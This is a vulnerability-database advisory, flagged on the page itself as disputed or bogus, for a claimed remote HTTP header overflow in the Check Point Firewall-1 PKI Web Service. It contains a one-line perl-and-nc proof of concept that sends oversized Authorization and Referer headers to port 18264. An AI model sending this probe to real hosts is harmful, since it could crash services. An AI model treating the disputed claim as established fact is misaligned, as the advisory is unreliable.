WARNING! Fake news / Disputed / BOGUS

Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

2009-03-30 / 2009-03-31
Credit: Bugs NotHugs
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow - Description The Check Point Firewall-1 PKI Web Service, running by default on TCP port 18264, is vulnerable to a remote overflow in the handling of very long HTTP headers. This was discovered during a pen-test where the client would not allow further analysis and would not provide the full product/version info. Initial testing indicates the 'Authorization' and 'Referer' headers were vulnerable. - Product Check Point, Firewall-1, unknown - PoC perl -e 'print "GET / HTTP/1.0rnAuthorization: Basic" . "x" x 8192 . "rnFrom: bugs_at_hugs.comrnIf-Modified-Since: Fri, 13 Dec 2006 09:12:58 GMTrnReferer: http://www.owasp.org/" . "x" x 8192 . "rnUserAgent: FsckResponsibleDisclosure 1.0rnrn"' | nc suckit.com 18264 - Solution None - Timeline 2006-11-06: Vulnerability Discovered 2009-03-29: Disclosed to Public

References:

http://www.securitytracker.com/id?1021948
http://www.securityfocus.com/bid/34286
http://www.securityfocus.com/archive/1/archive/1/502256/100/0/threaded
http://www.milw0rm.com/exploits/8313
http://archives.neohapsis.com/archives/fulldisclosure/2009-03/0463.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top